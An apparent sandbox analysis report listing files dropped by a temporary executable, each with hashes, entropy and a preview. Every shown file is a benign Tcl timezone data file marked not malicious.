                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):187
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.810917109656368
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGE1QOa0IAcGE9Cvju:SlSWB9IZaM3y79CzVAIgp9CE2901Qv0k
                                                                                                                                                                                                                                                                                                                                MD5:4763D6524D2D8FC62720BCD020469FF6
                                                                                                                                                                                                                                                                                                                                SHA1:EE567965467E4F3BDFE4094604E526A49305FDD8
                                                                                                                                                                                                                                                                                                                                SHA-256:A794B43E498484FFD83702CFB9250932058C01627F6F6F4EE1432C80A9B37CD6
                                                                                                                                                                                                                                                                                                                                SHA-512:37462E0A3C24D5BAEBDD1ADCF8EE94EA07682960D710D57D5FD05AF9C5F09FF30312528D79516A16A0A84A2D351019DBB33308FC39EC468033B18FB0AC872C13
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Kralendijk) $TZData(:America/Curacao).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):210
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853705210019575
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52IAcGEyUMWkXGm2OHpJvvvX+nFp1vZSsXxyFYMUmBXlVvG9:SlSWB9X5290Xm2OHphvPKZpyFMmBVVO9
                                                                                                                                                                                                                                                                                                                                MD5:FE113AA98220A177DA9DD5BF588EB317
                                                                                                                                                                                                                                                                                                                                SHA1:083F2C36FF97185E2078B389F6DB2B3B04E95672
                                                                                                                                                                                                                                                                                                                                SHA-256:AF2A931C2CC39EED49710B9AFDBB3E56F1E4A1A5B9B1C813565BE43D6668493A
                                                                                                                                                                                                                                                                                                                                SHA-512:B6A34966F4150E3E3785563DFEB543726868923DB3980F693B4F2504B773A6CFD4102225C24897C81F1B3D22F35D1BE92D5ECE19F03028AC485A6B975896BB8F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/La_Paz) {. {-9223372036854775808 -16356 0 LMT}. {-2524505244 -16356 0 CMT}. {-1205954844 -12756 1 BST}. {-1192307244 -14400 0 -04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):444
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.171707948838632
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290BbmdH4VPvut/O9F/O9BQXR/uFEC3/O9Ge/uFAs/O92/O9PF/O9R8/O9Tu:cQye8mV6FC4R/u1Cp/u2sC2CdC6CTSPV
                                                                                                                                                                                                                                                                                                                                MD5:D20722EC3E24AA65C23DB94006246684
                                                                                                                                                                                                                                                                                                                                SHA1:3E9D446FFA6163ED658D947BB582C9F566374777
                                                                                                                                                                                                                                                                                                                                SHA-256:593FEBC924D0DE7DA5FC482952282F1B1E3432D7509798F475B13743047286DA
                                                                                                                                                                                                                                                                                                                                SHA-512:326E300C837981DEFC497B5E467EA70DC2F6F10765FAB39977A2F03F3BEF0A0917EFD0524E2B66CBCFE0EE424273594437E098C6503EFC73002673678016C605
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Lima) {. {-9223372036854775808 -18492 0 LMT}. {-2524503108 -18516 0 LMT}. {-1938538284 -14400 0 -05}. {-1002052800 -18000 0 -05}. {-986756400 -14400 1 -05}. {-971035200 -18000 0 -05}. {-955306800 -14400 1 -05}. {-939585600 -18000 0 -05}. {512712000 -18000 0 -05}. {544248000 -18000 0 -05}. {638942400 -18000 0 -05}. {765172800 -18000 0 -05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9409
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.767062784666229
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:lBY5PBFx/9jgNf+aNwj/lpmlOxnKcndIG:lBY5PBFx/9wfefnK6
                                                                                                                                                                                                                                                                                                                                MD5:A661407CC08E68459018A636C8EF0EC1
                                                                                                                                                                                                                                                                                                                                SHA1:5524A613B07C4B4CA7404504EAD917E5B0A00112
                                                                                                                                                                                                                                                                                                                                SHA-256:C39E5A4C1482B13E862B4D36F4F4590BDF230BE44BAC30BDAB015CDBE02BE9C9
                                                                                                                                                                                                                                                                                                                                SHA-512:F5BD08D99E0B54911AC3ABFD413A1D98A0EB7F39A41E348E17D38EA9226A9320BA0CFE9CEB0954D158AB9B8761F0A9ECFB6F82DF033CD9B2234BC71A2D163B3A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Los_Angeles) {. {-9223372036854775808 -28378 0 LMT}. {-2717640000 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-687967140 -25200 1 PDT}. {-662655600 -28800 0 PST}. {-620838000 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589388400 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557938800 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526489200 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495039600 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463590000 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431535600 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400086000 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368636400 -25200 1 PDT}. {-355330800 -28800 0 PST}. {
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):223
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.866250035215905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y71PiKp4ozFVAIgp1PiKp4zL290hp4901PiKp4/:MBaIMYPyJpPyzL290P490Py/
                                                                                                                                                                                                                                                                                                                                MD5:3BAD2D8B6F2ECB3EC0BFA16DEAEBADC3
                                                                                                                                                                                                                                                                                                                                SHA1:2E8D7A5A29733F94FF247E7E62A7D99D5073AFDC
                                                                                                                                                                                                                                                                                                                                SHA-256:242870CE8998D1B4E756FB4CD7097FF1B41DF8AA6645E0B0F8EB64AEDC46C13C
                                                                                                                                                                                                                                                                                                                                SHA-512:533A6A22A11C34BCE3772BD85B6A5819CCCD98BF7ECED9E751191E5D1AD3B84F34D70F30936CFE501C2FA3F6AAC7ABB9F8843B7EB742C6F9C2AD4C22D5C73740
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Kentucky/Louisville)]} {. LoadTimeZoneFile America/Kentucky/Louisville.}.set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.81236985301262
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGEyOqdVM1h4IAcGE9Cva:SlSWB9IZaM3y79CzVAIgp9CE290h48hf
                                                                                                                                                                                                                                                                                                                                MD5:EBB062CC0AA5C21F7C4278B79B9EAE6C
                                                                                                                                                                                                                                                                                                                                SHA1:6DFC8303BBE1FB990D7CB258E7DBC6270A5CFE64
                                                                                                                                                                                                                                                                                                                                SHA-256:4842420076033349DD9560879505326FFAB91BED75D6C133143FFBBFB8725975
                                                                                                                                                                                                                                                                                                                                SHA-512:5087C6257CA797317D049424324F5DC31BBD938436DCEB4CF4FE3D2520F7745F1C023E3EC48689957E389900EF2AACB3F5E9E49FD154DF51FF89F9A7173818CD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Lower_Princes) $TZData(:America/Curacao).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1487
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.655866753080831
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQGEecc4h1u80V2dBUGphmC17ewGtN3rvIh0VKngBHZDIOXqWoN:5K4h19U2dBUGrmO7XGtN3kh0VKngBHZy
                                                                                                                                                                                                                                                                                                                                MD5:3BC7560FE4E357A36D53F6DCC1E6F176
                                                                                                                                                                                                                                                                                                                                SHA1:F9F647E5021344A3A350CD895A26B049331E7CF1
                                                                                                                                                                                                                                                                                                                                SHA-256:184EC961CA5D1233A96A030D75D0D47A4111717B793EE25C82C0540E25168BDD
                                                                                                                                                                                                                                                                                                                                SHA-512:0805146230F55E12D7524F3F4EDB53D9C6C41C6926FA0603B3958AA82E85C9531D8CBDF4DFF085189908F293A2B29FDFA1BAEFB0FDADF34134D6C4D2FCF19397
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Maceio) {. {-9223372036854775808 -8572 0 LMT}. {-1767217028 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-191365200 -7200 1 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}. {592974000 -7200 1 -03}. {60
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):590
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.233264210289004
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290znTsmdHOYPprva6/wLAyM/uFn/V8/uFn/3Y/oA2P/RASx/uFn/G/uFn/M:cQGnoeOshRIpMSn/V8Sn/3YVgJvxSn/6
                                                                                                                                                                                                                                                                                                                                MD5:6BF9AB156020E7AC62F93F561B314CB8
                                                                                                                                                                                                                                                                                                                                SHA1:7484A57EADCFD870490395BB4D6865A2E024B791
                                                                                                                                                                                                                                                                                                                                SHA-256:D45B4690B43C46A7CD8001F8AE950CD6C0FF7B01CD5B3623E3DD92C62FD5E473
                                                                                                                                                                                                                                                                                                                                SHA-512:CF02E62650679D8E2D58D0D70DE2322CAAA6508AF4FF7A60E415AA8AA3A9D26D1A191CFAE986ACAF0AEF1DFC4C2E34F9A5B6EDC2018E0B7E9000917D429FB587
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Managua) {. {-9223372036854775808 -20708 0 LMT}. {-2524500892 -20712 0 MMT}. {-1121105688 -21600 0 CST}. {105084000 -18000 0 EST}. {161758800 -21600 0 CST}. {290584800 -18000 1 CDT}. {299134800 -21600 0 CST}. {322034400 -18000 1 CDT}. {330584400 -21600 0 CST}. {694260000 -18000 0 EST}. {717310800 -21600 0 CST}. {725868000 -18000 0 EST}. {852094800 -21600 0 CST}. {1113112800 -18000 1 CDT}. {1128229200 -21600 0 CST}. {1146384000 -18000 1 CDT}. {1159682400 -21600 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1127
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6965365214193797
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQGnveI8Sos/USws/QSI/LHSD/vOSy/WS3o/aS2/vSh/TSSX/WcSp/ySZd/YlSjc:5rSaSwXS4SqSbS3JSySxSxcSESAlSQSk
                                                                                                                                                                                                                                                                                                                                MD5:BFCC0D7639AE2D973CDBD504E99A58B8
                                                                                                                                                                                                                                                                                                                                SHA1:E8C43C5B026891D3E9B291446ABC050E7A100C71
                                                                                                                                                                                                                                                                                                                                SHA-256:1237FF765AA4C5530E5250F928DFAB5BB687C72C990A37B87E9DB8135C5D9CBD
                                                                                                                                                                                                                                                                                                                                SHA-512:DAD87E612161A136606E50944C50401AFD4C11D51A016704BDD070E52ED3BAC56E0E7BCFD83E7DA392FC8D2278E5F9EF6C0C466372F58AFA1005C4156CDA189D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Manaus) {. {-9223372036854775808 -14404 0 LMT}. {-1767211196 -14400 0 -04}. {-1206954000 -10800 1 -04}. {-1191358800 -14400 0 -04}. {-1175371200 -10800 1 -04}. {-1159822800 -14400 0 -04}. {-633816000 -10800 1 -04}. {-622065600 -14400 0 -04}. {-602280000 -10800 1 -04}. {-591829200 -14400 0 -04}. {-570744000 -10800 1 -04}. {-560206800 -14400 0 -04}. {-539121600 -10800 1 -04}. {-531349200 -14400 0 -04}. {-191361600 -10800 1 -04}. {-184194000 -14400 0 -04}. {-155160000 -10800 1 -04}. {-150066000 -14400 0 -04}. {-128894400 -10800 1 -04}. {-121122000 -14400 0 -04}. {-99950400 -10800 1 -04}. {-89586000 -14400 0 -04}. {-68414400 -10800 1 -04}. {-57963600 -14400 0 -04}. {499752000 -10800 1 -04}. {511239600 -14400 0 -04}. {530596800 -10800 1 -04}. {540270000 -14400 0 -04}. {562132800 -10800 1 -04}. {571201200 -14400 0 -04}. {590036400 -1440
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):202
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.890561068654966
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290zzJ/90e/:MBaIMY9QpI290zzN90O
                                                                                                                                                                                                                                                                                                                                MD5:3340CD9706ECBB2C6BCB16F1D75C5428
                                                                                                                                                                                                                                                                                                                                SHA1:FE230B53F0DCCE15C14C91F43796E46DA5C1A2CE
                                                                                                                                                                                                                                                                                                                                SHA-256:BC2F908758F074D593C033F7B1C7D7B4F81618A4ED46E7907CD434E0CCFEE9F4
                                                                                                                                                                                                                                                                                                                                SHA-512:016AB54B9E99600A296D99A036A555BB79E3C5FDB0F1BEB516AFFE17B7763D864CB076B9C2D95547ED44BA2F6FC372CDFF25708C5423E1CF643AB6F0AA78E0E3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Marigot) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):242
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7982301339896285
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290zlJm2OHfueP9dMQR5OfT/VVFUFkCFeR/r:MBp5290znmdHfnP9dMQR5Gb/uFkCFO/r
                                                                                                                                                                                                                                                                                                                                MD5:2F7A1415403071E5D2E545C1DAA96A15
                                                                                                                                                                                                                                                                                                                                SHA1:6A8FB2ABAD2B2D25AF569624C6C9AAE9821EF70B
                                                                                                                                                                                                                                                                                                                                SHA-256:40F3C68A518F294062AC3DD5361BB9884308E1C490EF11D2CFDC93CB219C3D26
                                                                                                                                                                                                                                                                                                                                SHA-512:3E4D94AB6A46E6C3BB97304F3A5596A06041C0E0935CC840F4A6EB56D0892778F853959A742C5B832CD8F07AB9B74539C45599F22C080577503B2E34B6CE28C5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Martinique) {. {-9223372036854775808 -14660 0 LMT}. {-2524506940 -14660 0 FFMT}. {-1851537340 -14400 0 AST}. {323841600 -10800 1 ADT}. {338958000 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6526
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7582526108760064
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:t+vN41+z6stuNEsRZLbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsr2:taN41+z6stuNEsRZLbXwDTIRqfh57TlE
                                                                                                                                                                                                                                                                                                                                MD5:2BBAA150389EAAE284D905A159A61167
                                                                                                                                                                                                                                                                                                                                SHA1:0001B50C25FC0CDF015A60150963AAF895EEDEEF
                                                                                                                                                                                                                                                                                                                                SHA-256:A7966B95DBE643291FB68E228B60E2DC780F8155E064D96B670C8290F104E4AB
                                                                                                                                                                                                                                                                                                                                SHA-512:87CE18E7E4C2C59A953CD47005EF406F4923730459996B1BF09B04FFD9CD5F963A9E50299ECCDBF4B24C565412B706B1ABC39890D659E6F409F1BA50308E57F9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Matamoros) {. {-9223372036854775808 -24000 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6619
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.788952004807415
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:W7ezBT8tRkfKxhzY720zaOXmlITHjLc1cb:X8tRkfKv+2wB9h
                                                                                                                                                                                                                                                                                                                                MD5:4D63766E65BF3E772CCEC2D6DB3E2D3E
                                                                                                                                                                                                                                                                                                                                SHA1:DB541D2908159C7EF98F912D8DBC36755FFD13F3
                                                                                                                                                                                                                                                                                                                                SHA-256:81CEA4A397AF6190FD250325CF513976B3508209AE3A88FDFD55490A5016A36D
                                                                                                                                                                                                                                                                                                                                SHA-512:DFAF1B3547B1B1B78B33F1F0F5E9624C693492687EC5D060FC4C6CBE2AFBB61B2E9B618133636DD62364D28B2450F741561AADFDE7B811F579BBC7247343A041
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mazatlan) {. {-9223372036854775808 -25540 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):214
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.76389929825594
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MBVAIgp/Ma290zpH+90/MI:MBaIMY/Mcp/Ma290zpe90/MI
                                                                                                                                                                                                                                                                                                                                MD5:A6EFD8F443D4CB54A5FB238D4D975808
                                                                                                                                                                                                                                                                                                                                SHA1:8F25C6C0EA9D73DC8D1964C4A28A4E2E783880CC
                                                                                                                                                                                                                                                                                                                                SHA-256:39B34B406339F06A8D187F8CCC1B6BF2550E49329F7DCE223619190F560E75F8
                                                                                                                                                                                                                                                                                                                                SHA-512:4B5D48472D56AF19B29AD2377573CC8CB3ED9EF1AF53C00C907B6576FA852EA3D1E9F9B3A78A280DC44F8ADBE5B81D6AEC2609BE08FFA08507CD0F4139878F46
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Mendoza)]} {. LoadTimeZoneFile America/Argentina/Mendoza.}.set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8136
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7460641906933345
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:oXxj07ffkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbdXvC:oXxj07ffNTzZSJw5/9/yuvQ6crD57X0w
                                                                                                                                                                                                                                                                                                                                MD5:0D0DC4A816CDAE4707CDF4DF51A18D30
                                                                                                                                                                                                                                                                                                                                SHA1:7ED2835AA8F723B958A6631092019A779554CADE
                                                                                                                                                                                                                                                                                                                                SHA-256:3C659C1EAC7848BBE8DF00F857F8F81D2F64B56BD1CEF3495641C53C007434FA
                                                                                                                                                                                                                                                                                                                                SHA-512:930F2FDC2C1EAE4106F9B37A16BCBBAF618A2CCBBA98C712E8215555CF09B9303D71842DEC38EFAF930DB71E14E8208B14E41E10B54EF98335E01435D0FC3518
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Menominee) {. {-9223372036854775808 -21027 0 LMT}. {-2659759773 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-116438400 -18000 1 CDT}. {-100112400 -21600 0 CST}. {-21484800 -18000 0 EST}. {104914800 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6435
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.757504464563519
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:gN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmR:gN41+z6stuNEsRZjWqZL/1dCYDDCxyHo
                                                                                                                                                                                                                                                                                                                                MD5:A7C5CFE3FA08D4CEDF6324457EA5766E
                                                                                                                                                                                                                                                                                                                                SHA1:83BB96398C0B1B34771940C8F7A19CB78C5EF72F
                                                                                                                                                                                                                                                                                                                                SHA-256:A1D7DE7285DC78ADDE1B0A04E05DA44D0D46D4696F67A682D0D28313A53825FE
                                                                                                                                                                                                                                                                                                                                SHA-512:092DD7CEF6A5861472965E082171937EEDCFB3AE1821E3C88AA1BDFAB1EC48F765CAC497E3E5C78C19653C78B087C7CE28A8AB76F9073558963234901EF4B4A4
                                                                                                                                                                                                                                                                                                                                Malicious:false
